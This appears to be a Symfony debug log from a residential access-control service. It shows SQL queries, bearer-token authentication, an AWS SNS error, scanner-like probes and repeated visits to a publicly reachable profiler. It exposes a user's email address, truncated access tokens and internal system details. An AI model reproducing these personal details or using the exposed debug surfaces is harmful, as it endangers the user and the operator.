[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["21634f24-58b5-45c7-becd-1d [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [490,1] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [490,1] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [490,255] []
[2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 17:41:54] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"521cb7fb-4b51-4095-9d92-51d2933080dd","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/521cb7fb-4b51-4095-9d92-51d2933080dd/invitation/10/0?order=desc","method":"GET"} []
[2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
[2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [490,255,1] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["521cb7fb-4b51-4095-9d92-51 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [255,1] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [255,1] []
[2025-12-16 17:41:54] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
[2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [379] []
[2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
[2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["0F00AE6E-15BB-4D70-B7F3-58 [...]",1,490] []
[2025-12-16 17:41:54] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>f66edc90-461b-5b34-ba4d-bd2bda39a66d</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>f66edc90-461b-5b34-ba4d-bd2bda39a66d</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-16 17:41:54] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 17:45:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c412a9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c412a9?panel=exception","method":"GET"} []
[2025-12-16 17:45:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 17:49:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=cache","method":"GET"} []
[2025-12-16 17:49:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 17:57:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5942b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c5942b?panel=twig","method":"GET"} []
[2025-12-16 17:57:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 18:05:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=db","method":"GET"} []
[2025-12-16 18:05:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 18:14:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7","method":"GET"} []
[2025-12-16 18:14:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 18:19:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:29:49] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 18:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:29:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:29:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:29:50] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-16 18:30:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
[2025-12-16 18:30:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 18:38:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a3dfd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a3dfd1?panel=twig","method":"GET"} []
[2025-12-16 18:38:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 18:38:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:39:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 18:39:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:39:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:39:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:39:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 18:39:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
[2025-12-16 18:40:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=config","method":"GET"} []
[2025-12-16 18:40:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 18:52:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89abd5","method":"GET"} []
[2025-12-16 18:52:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 18:52:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ba74a2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ba74a2?panel=twig","method":"GET"} []
[2025-12-16 18:52:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 18:52:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-16 18:52:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-16 19:01:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"19f228","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/19f228?panel=time","method":"GET"} []
[2025-12-16 19:01:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 19:02:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 19:03:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 19:03:36] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"804cf9","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/804cf9","method":"GET"} []
[2025-12-16 19:04:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
